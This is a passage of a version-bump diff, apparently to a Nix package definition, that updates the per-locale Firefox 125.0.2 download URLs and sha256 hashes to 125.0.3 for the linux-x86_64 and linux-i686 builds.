"35a9d216fed5fddd71f1801b0a2a1178c8c646a4d879502d0f56daa2675deea4"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/hr/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/hr/firefox-125.0.3.tar.bz2"; locale = "hr"; arch = "linux-x86_64"; - sha256 = "defb3c3e05b58525dde6bc5d8c2b0ffa096d6e86f320882234acd3564f394c4d"; + sha256 = "b7d62b7ba3261f76e1f6a8c9df79dbbb7a2e2c9efb56a4d30f6be1b37a6f1f1f"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/hsb/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/hsb/firefox-125.0.3.tar.bz2"; locale = "hsb"; arch = "linux-x86_64"; - sha256 = "a4fe13dc42bc37262e34c0f9a63e63e79b0e91614cfda5c84cbeed928e9c8800"; + sha256 = "b6e5031ea996de5449c362d476afacbd7a7310f22cfc108dbab0e745897459c8"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/hu/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/hu/firefox-125.0.3.tar.bz2"; locale = "hu"; arch = "linux-x86_64"; - sha256 = "f50c9778a1c83c30e31926f15bc00caa405041eb9f686a10463b64178159f0dd"; + sha256 = "fbc3cdadb14dd5755ad6e64dda7350df60f43c576dcba09ed082fabda2a5a130"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/hy-AM/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/hy-AM/firefox-125.0.3.tar.bz2"; locale = "hy-AM"; arch = "linux-x86_64"; - sha256 = "39684d30a43a314aef722ae757d6e2fd58af76c9861a708455b9df8eacbf2d5b"; + sha256 = "d37f52f64d3a56cf043ce1f198485228877419c4231a8b1816af7d2efb7c9156"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ia/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ia/firefox-125.0.3.tar.bz2"; locale = "ia"; arch = "linux-x86_64"; - sha256 = "8e99811b2ee15adaf78eaecebb59c506e45b0402a052353d6007f5da7ba6461a"; + sha256 = "1abb3b691d218da98df54b08228181d201ebcdd397b23bd438761c26e91d70b0"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/id/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/id/firefox-125.0.3.tar.bz2"; locale = "id"; arch = "linux-x86_64"; - sha256 = "a53d77bcb75cfe8c0c7951711f9b11681fa5aaf20a2bb8ec6cf2198572624980"; + sha256 = "e003f96e908abb817efaa518ad4d4da3724077b0e478eec311b065f5a1ef6a26"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/is/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/is/firefox-125.0.3.tar.bz2"; locale = "is"; arch = "linux-x86_64"; - sha256 = "c5b85b3e16e2d6300ed4f1196325630b53eb9edbc4688ee8187d6a77b641a339"; + sha256 = "09ea5c1828d9bb6d9eb89cce854892ff5300641e3eec69bec251937d442caea6"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/it/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/it/firefox-125.0.3.tar.bz2"; locale = "it"; arch = "linux-x86_64"; - sha256 = "3a70bc2b11b133b170482c88981b726cb734b9f5eaf0115bc4e65734f7862ce8"; + sha256 = "ab3e1df035e7198a70a6ad5dbcbf13915a5a98a554497438980a56adb550b45c"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ja/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ja/firefox-125.0.3.tar.bz2"; locale = "ja"; arch = "linux-x86_64"; - sha256 = "a490ced3f87b4b89d717365b196b8c0a311da50ad0392a056190466ac399e178"; + sha256 = "1d9cac5e97b86c76b908fef1c8f981476a054cfd6d365cf7d9d3a7cd2800d56f"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ka/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ka/firefox-125.0.3.tar.bz2"; locale = "ka"; arch = "linux-x86_64"; - sha256 = "02749be6732a88fa5593d4c1dae76a2626bb5ce516cee98c205900aa4b785ec4"; + sha256 = "518b72d8e5188f01e0ea0eb90d4760b98b0dd7f1e74a0cde8e9809e25117d9f9"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/kab/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/kab/firefox-125.0.3.tar.bz2"; locale = "kab"; arch = "linux-x86_64"; - sha256 = "3a26d92fabc60ad584c98d8b21eb46cad94a4d69dd3a5a1c30b73d72a73dc507"; + sha256 = "eac92cceaae9348cfae57ad891fae6827f25ec03df649e2d7a3c7186fcbab01d"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/kk/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/kk/firefox-125.0.3.tar.bz2"; locale = "kk"; arch = "linux-x86_64"; - sha256 = "0c68d4db9fec3dbfd240c211179fcc72a18fe44f6f4526f1520b9f77eca497e6"; + sha256 = "c2dfc1d48cc5386c9925de7a33cf368b2040accea7dfcc67038d2394d828b3e4"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/km/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/km/firefox-125.0.3.tar.bz2"; locale = "km"; arch = "linux-x86_64"; - sha256 = "a823adbc5ed6d00c6611cef7278766ab67095d05df28f4feea74ac36bb35159d"; + sha256 = "f032f51e6c6b655ac6ab7ed1605f701c99f71bc316d76f06c2fa6fb111c61276"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/kn/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/kn/firefox-125.0.3.tar.bz2"; locale = "kn"; arch = "linux-x86_64"; - sha256 = "4acfaf770e803a9f95d6538169864af173efdca5979b5e53e255e246b5bdfddc"; + sha256 = "8d47dd21f7968cd1151d25609fa2276cf3e9b8bc7cbfab307a2efa84f541e5ba"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ko/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ko/firefox-125.0.3.tar.bz2"; locale = "ko"; arch = "linux-x86_64"; - sha256 = "d7f9f882a33f3024173243960dd65165062a3e5fb72b76b413ba0225f0e82171"; + sha256 = "de7b527a436ba0f27175ee7f8e6ed9238bbcb716ebb26f9b0c9cc5b30a3240eb"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/lij/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/lij/firefox-125.0.3.tar.bz2"; locale = "lij"; arch = "linux-x86_64"; - sha256 = "a6991f8be2d09111a545e39a1114ade9b51f1a4667f62267719b4d99f8312ab3"; + sha256 = "809675ae60d9885fe20e4053d0d0686cc6d22cb6fc6fbcbb76c76579e47d97f2"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/lt/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/lt/firefox-125.0.3.tar.bz2"; locale = "lt"; arch = "linux-x86_64"; - sha256 = "952de896927ede1f4650ee45e1fcb3bb5ea28f81b9ae711ec8d72e6a15a37649"; + sha256 = "cb512ed0fef4a1d544c4a74d81e6872091ccee8a2356c5c5f18d6edd1a601c06"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/lv/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/lv/firefox-125.0.3.tar.bz2"; locale = "lv"; arch = "linux-x86_64"; - sha256 = "1beaef01e6dc993450d0f787f80ad5a50c8d5288e816775d1c0ced012cea81ba"; + sha256 = "5d693ca8c453c37baa6a1c284041a380815e48f6e728b4ead06f6afcb27f0558"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/mk/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/mk/firefox-125.0.3.tar.bz2"; locale = "mk"; arch = "linux-x86_64"; - sha256 = "38ab05672f75133480c02c69e89364ea75c7fddc5cce4b38e26d2bbc49720f52"; + sha256 = "352daa1a8995c40803bf34f1e00afa6ed95a2b98582992d1a34b0d6331e1c893"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/mr/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/mr/firefox-125.0.3.tar.bz2"; locale = "mr"; arch = "linux-x86_64"; - sha256 = "e4bccdf8b86959ae7037468886bf1b8bd0ce2e72b78fd284c2a9d01d7594b488"; + sha256 = "a5bb5ea7fc2a3f5f0f71f14cba8b594bff15da10a3a879fb14311ea25b12ccb3"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ms/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ms/firefox-125.0.3.tar.bz2"; locale = "ms"; arch = "linux-x86_64"; - sha256 = "781b8993cb31223f01eef9e1c1736fd65f88def01d5163015496c57c80a952d7"; + sha256 = "c544e324549f84337d9a7e0e863c1b0be6f3435d9cf890a6a73fff62ce9ab8ae"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/my/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/my/firefox-125.0.3.tar.bz2"; locale = "my"; arch = "linux-x86_64"; - sha256 = "4de4a0f5c23f2ecf715da6d53a5db187f0f3a24ec96da65f3c3326fafc90f4cd"; + sha256 = "9de9d7f95e75f733666599de2b57b487ac3ca545487101ab3d097e85dd9f2daf"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/nb-NO/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/nb-NO/firefox-125.0.3.tar.bz2"; locale = "nb-NO"; arch = "linux-x86_64"; - sha256 = "c3d5174d3b9bc06832f1db0ec52597ded859b10c93a8393f326798b9ca9a9092"; + sha256 = "c1a5ce764dbb1f090c01330991af161745d4df945d51346a571f24dae6dc0353"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ne-NP/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ne-NP/firefox-125.0.3.tar.bz2"; locale = "ne-NP"; arch = "linux-x86_64"; - sha256 = "74e4887923e23e564c8c9760f9000febea221a1a1719923fb35b5e8a274bc537"; + sha256 = "7c04f1b49e4d301533e1e15c08a88a768c536677a55f1d2cc9f4fa7d3bd1f26a"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/nl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/nl/firefox-125.0.3.tar.bz2"; locale = "nl"; arch = "linux-x86_64"; - sha256 = "06e98ab97d45d4f76ebd5f16059a87591de279b189dada428eaa31be5edb9e58"; + sha256 = "a81916a67375d43a2883111474858ca8aed787a12cee1d503fae5ec2413cc778"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/nn-NO/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/nn-NO/firefox-125.0.3.tar.bz2"; locale = "nn-NO"; arch = "linux-x86_64"; - sha256 = "d4dd1f483f9f4a74efcfe70fd25473ae1162a6fbd30bd2dabc7da38d49dafd32"; + sha256 = "282e7e2dcd7d01c1bb8c3861511aaa989a1e23e79c7ad5958956a3725c595650"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/oc/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/oc/firefox-125.0.3.tar.bz2"; locale = "oc"; arch = "linux-x86_64"; - sha256 = "2d2b7e612cd3c10fa390f08fcd5bfe7808c4563e79dec1391f4d88e103bcecde"; + sha256 = "aad97d4a4bb4229017ef8e84ce79597e5ffe0108c1898c4188ffc1baf2368bf6"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/pa-IN/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/pa-IN/firefox-125.0.3.tar.bz2"; locale = "pa-IN"; arch = "linux-x86_64"; - sha256 = "287d1f46526bc07d74a3317f7bbc7b781622cab1929f9265a439cf724d275cbd"; + sha256 = "1ae4b77596984e0daf341ee562d78aa653914b8e20627dc568d86ec2bc87a7bb"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/pl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/pl/firefox-125.0.3.tar.bz2"; locale = "pl"; arch = "linux-x86_64"; - sha256 = "61a04f0b259841d6855f27ce1272b8a5cb5bb63171d6b59185760f91ba55f228"; + sha256 = "979b3892b3f7056ea173946e5950f71e0ea8a740f4016ae9aeb4a58edb0fb679"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/pt-BR/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/pt-BR/firefox-125.0.3.tar.bz2"; locale = "pt-BR"; arch = "linux-x86_64"; - sha256 = "bd7981044c90498ed6b69058c526378edac609456ee5bd17a27e2d5ab8aeea2c"; + sha256 = "7aa3b0e46f6c0c36443c61b43b15db420e509d6793f6ff63759ee0e9eed3d6c2"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/pt-PT/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/pt-PT/firefox-125.0.3.tar.bz2"; locale = "pt-PT"; arch = "linux-x86_64"; - sha256 = "845063d62e92923afdfce5f8cdaf830fc861e3e80d0f0a9e87944054c3af078c"; + sha256 = "ecbeb1dc3292eeecdad0cd302b70445e9fa4fa6a6f9c83a698e5193f2f4c543e"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/rm/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/rm/firefox-125.0.3.tar.bz2"; locale = "rm"; arch = "linux-x86_64"; - sha256 = "11729b87358cdd32d374bb7097625d94d49c0f491085e0a338170da2fd5ff78e"; + sha256 = "17dfd6e52f056481d4c5ef45ffae76a8005034fdcfdca046d12966b316852b91"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ro/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ro/firefox-125.0.3.tar.bz2"; locale = "ro"; arch = "linux-x86_64"; - sha256 = "5480b2d8bc4a3d820104c3faee11240ac8c1ff002ed5b784ed2ae3a39e813deb"; + sha256 = "03e3bb8b8d6f6752aee13b445f79cbcb5999224359165deb565c00e79505aee7"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ru/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ru/firefox-125.0.3.tar.bz2"; locale = "ru"; arch = "linux-x86_64"; - sha256 = "be35c75aaaeeb2b8dc07a807ea906b82032e01e800e91b044a7c559039883e3a"; + sha256 = "b3f3bc5db58106f7ce085aa13422974ec2a77fc1289e6ccecce66731194b1885"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/sat/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/sat/firefox-125.0.3.tar.bz2"; locale = "sat"; arch = "linux-x86_64"; - sha256 = "2b63b616bfba962a9c2382c59182bd4acb0ca44c693ccfde911449db2730820c"; + sha256 = "de73c27a3eddba12687edcc6cb18cd1e7d055eb0f19e13b019901a8e21ade74c"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/sc/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/sc/firefox-125.0.3.tar.bz2"; locale = "sc"; arch = "linux-x86_64"; - sha256 = "478c94327cb3d4e51981a0a3adddd0b7f00ce8b54fd21e0b233277f0131941ea"; + sha256 = "a5444d59372a88fc3fa7eef03d8ed5840b07b3cb5845ac96b2cbcab404cff35b"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/sco/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/sco/firefox-125.0.3.tar.bz2"; locale = "sco"; arch = "linux-x86_64"; - sha256 = "84721bbb09ac8036013d2ebd7d053b20531c1873004c67e8723bb7986fa18641"; + sha256 = "a4cab5bb51709ae5f3a6ac1b4c113dd9adcc973aee3bc480b763d89677b4b75c"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/si/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/si/firefox-125.0.3.tar.bz2"; locale = "si"; arch = "linux-x86_64"; - sha256 = "fce4cdd335e52207980f1329ba3190ef224188679a9c2cd0c81b87b663953874"; + sha256 = "8d4b2d9d5de196db515c4852fe6bc0b866c7bdaae7f734053fd6f0fabaab8054"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/sk/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/sk/firefox-125.0.3.tar.bz2"; locale = "sk"; arch = "linux-x86_64"; - sha256 = "9ebc5c03aed1b417efaf40103bcf41ef59d06bef081a37c40fe6f9ea55e625c2"; + sha256 = "58b4b780317ad6e88b824fc31fd1777425abc673ce76a578dbfbae3db1247599"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/sl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/sl/firefox-125.0.3.tar.bz2"; locale = "sl"; arch = "linux-x86_64"; - sha256 = "f13472ed1ba867350e5255e3d70f83e0925116575e02a6846d814c59ab071837"; + sha256 = "c6663467611b7b9bed4d3bb0bf70465ed7812038067a6d034f70ec59af3c937f"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/son/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/son/firefox-125.0.3.tar.bz2"; locale = "son"; arch = "linux-x86_64"; - sha256 = "6cbf423f1f464835d4f076f0cdb0910e7c152271884d686d988db048dd06992c"; + sha256 = "066b5c9ffd986a56460bba1021272a42b66e1c93f601664f8f6a0e939314f22f"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/sq/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/sq/firefox-125.0.3.tar.bz2"; locale = "sq"; arch = "linux-x86_64"; - sha256 = "4bfa8c3be90651e0ecbac820fa1acc38ae5dd0916fe18250c2b2cf2c8f6d401e"; + sha256 = "d9d696c0748b1cc3238c39cc3f7b69e6ef2970402d68494084e6897f947d1493"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/sr/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/sr/firefox-125.0.3.tar.bz2"; locale = "sr"; arch = "linux-x86_64"; - sha256 = "b2405bdf08213345271a52e80270e45298ef66776e04947a5a38985a048b93a6"; + sha256 = "73411b25f8abebd15a4e716c2ee3a861670df257d7b1497ccfbc92aa055b8af2"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/sv-SE/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/sv-SE/firefox-125.0.3.tar.bz2"; locale = "sv-SE"; arch = "linux-x86_64"; - sha256 = "c45ab928dae8b4ead94cf977fb441df786aa6b80aa63a27ca6cabc66e8853b91"; + sha256 = "a877cf095668f7492a762d4fcebfe9ce154d0594e3a4a105d5c9046e1f9ee26c"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/szl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/szl/firefox-125.0.3.tar.bz2"; locale = "szl"; arch = "linux-x86_64"; - sha256 = "3a7c420f68614ec9b2a2d60aa9027b43ad38b67f9317de24bda551a8d1af261d"; + sha256 = "45477dba947128e7e4902715ee1ac7898422c34551c308f6f2388df8bc3f8982"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ta/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ta/firefox-125.0.3.tar.bz2"; locale = "ta"; arch = "linux-x86_64"; - sha256 = "1847f9234956a76365207d7b9ecacd594f67896a1beeeb3792038ef24b51a2fd"; + sha256 = "acb5eefe0aafcd146946ce390a9df077c477c029f0cfda6da3da00a3a6e844cd"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/te/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/te/firefox-125.0.3.tar.bz2"; locale = "te"; arch = "linux-x86_64"; - sha256 = "13411399d0cb4993cec0cb5bd1d1dc2c24073620b9cb36d390a3606f4a251047"; + sha256 = "98e43739bbe0117a5b875d5e66863e76a45d45f8a9b7b7afdfcd9d858402c075"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/tg/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/tg/firefox-125.0.3.tar.bz2"; locale = "tg"; arch = "linux-x86_64"; - sha256 = "7c477ad4e273bfd23a91e018cee8955e7b7605dccdbc8585285902b7f0cfdd6e"; + sha256 = "8c6f9dce430b7207665cdfd442cbd1bdaa1978651e745eec3b77c8eb52963aa1"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/th/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/th/firefox-125.0.3.tar.bz2"; locale = "th"; arch = "linux-x86_64"; - sha256 = "dc66bbd288067fb256c16cd83025f3c5dda45a2e8bbbccc3deda72a62bed56f0"; + sha256 = "2a18d85e28fb7d415ab71f9a966b6799dd6c2fdeeff5f4b0e65dbea449a77fa2"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/tl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/tl/firefox-125.0.3.tar.bz2"; locale = "tl"; arch = "linux-x86_64"; - sha256 = "d198857dace1d8798a2ef09cfbb80e80dd5dfd5d6cf2d4427260b72726972ba5"; + sha256 = "4517393fdbcba061dd7a667b92ba7b44e69ee73036ab36624e5681195a372a6b"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/tr/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/tr/firefox-125.0.3.tar.bz2"; locale = "tr"; arch = "linux-x86_64"; - sha256 = "ffb9b7ffef7385bbfe53f2b18c8fff5c6ba1bc44c89a52e4db21d46b9bd4b87d"; + sha256 = "5bff1a8d3044d5ce9195d5cd9aba3e02b21d4e23bf84870ac3b288777c5001c4"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/trs/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/trs/firefox-125.0.3.tar.bz2"; locale = "trs"; arch = "linux-x86_64"; - sha256 = "21078973238b093474fbc34c1b411f3a0ec4293da44215f99eb65e70d09585f4"; + sha256 = "8c75284765e4e4778a8dcba326369f7f8d62627bcf95f4384ab68b2339f245b9"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/uk/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/uk/firefox-125.0.3.tar.bz2"; locale = "uk"; arch = "linux-x86_64"; - sha256 = "625e545c4daed88fb87173bed12ac2d1927e0d38b2623b6e4a9ea1e170af3d8f"; + sha256 = "6ad348a509db7651e96ad6a4015dad3b7e4073d02a6936eac0b15aab9216feef"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/ur/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/ur/firefox-125.0.3.tar.bz2"; locale = "ur"; arch = "linux-x86_64"; - sha256 = "f507fc9d121691404f427394736cde58fc57223c1fc2e49628560beb2834c3c4"; + sha256 = "71714780ef8d0d7bd072744dc450f4d3db43e8eaca8df76ebf0471debe8fdbb6"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/uz/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/uz/firefox-125.0.3.tar.bz2"; locale = "uz"; arch = "linux-x86_64"; - sha256 = "0a4a7ab783abf28c72d8dc05fb89d1c595e9cb6c4230162ffa61e56f9cd4a900"; + sha256 = "c8e095e7259f14c6b98a32fba83154c6f83b2dbe8e19f7876434b22d3529fe4e"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/vi/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/vi/firefox-125.0.3.tar.bz2"; locale = "vi"; arch = "linux-x86_64"; - sha256 = "c11b780a90868ad2a352c724eed2308e8f8348ed854773370dab467dfae1a037"; + sha256 = "82b8321d1e5d321f65ca1977a24d67b5663866c883fecae1553dc2d6a2b70304"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/xh/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/xh/firefox-125.0.3.tar.bz2"; locale = "xh"; arch = "linux-x86_64"; - sha256 = "196ba78639720766d7f199ebd0cfcaf7dd47ca81c15e19fece45a7c90ba41659"; + sha256 = "06a67bbcedf238921f3211b2d36ebe02ee123cac3cb90820fd06eba7316fdaab"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/zh-CN/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/zh-CN/firefox-125.0.3.tar.bz2"; locale = "zh-CN"; arch = "linux-x86_64"; - sha256 = "861c2b6a384976ab9b134ff62518e7bd9d52298c2020f7e8e93298f306bbb2d6"; + sha256 = "074fadec864960fafa5aafb41f05e638a97b37c00a26e8f9e838357f484c523b"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-x86_64/zh-TW/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-x86_64/zh-TW/firefox-125.0.3.tar.bz2"; locale = "zh-TW"; arch = "linux-x86_64"; - sha256 = "a1994e5d0fab6cd4ec2e7ceb7406955bcbf3aae240cb8c5dcf2c10325a50d1d9"; + sha256 = "01cf02595225f172ab77ad12c3c7d61456703f3e80d88e38e4fbd5d047f2c0f3"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ach/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ach/firefox-125.0.3.tar.bz2"; locale = "ach"; arch = "linux-i686"; - sha256 = "c5fd729c3397225d4c34dcc3980ce7db50c4983e2d6b03480f1ba8c34bbfdccb"; + sha256 = 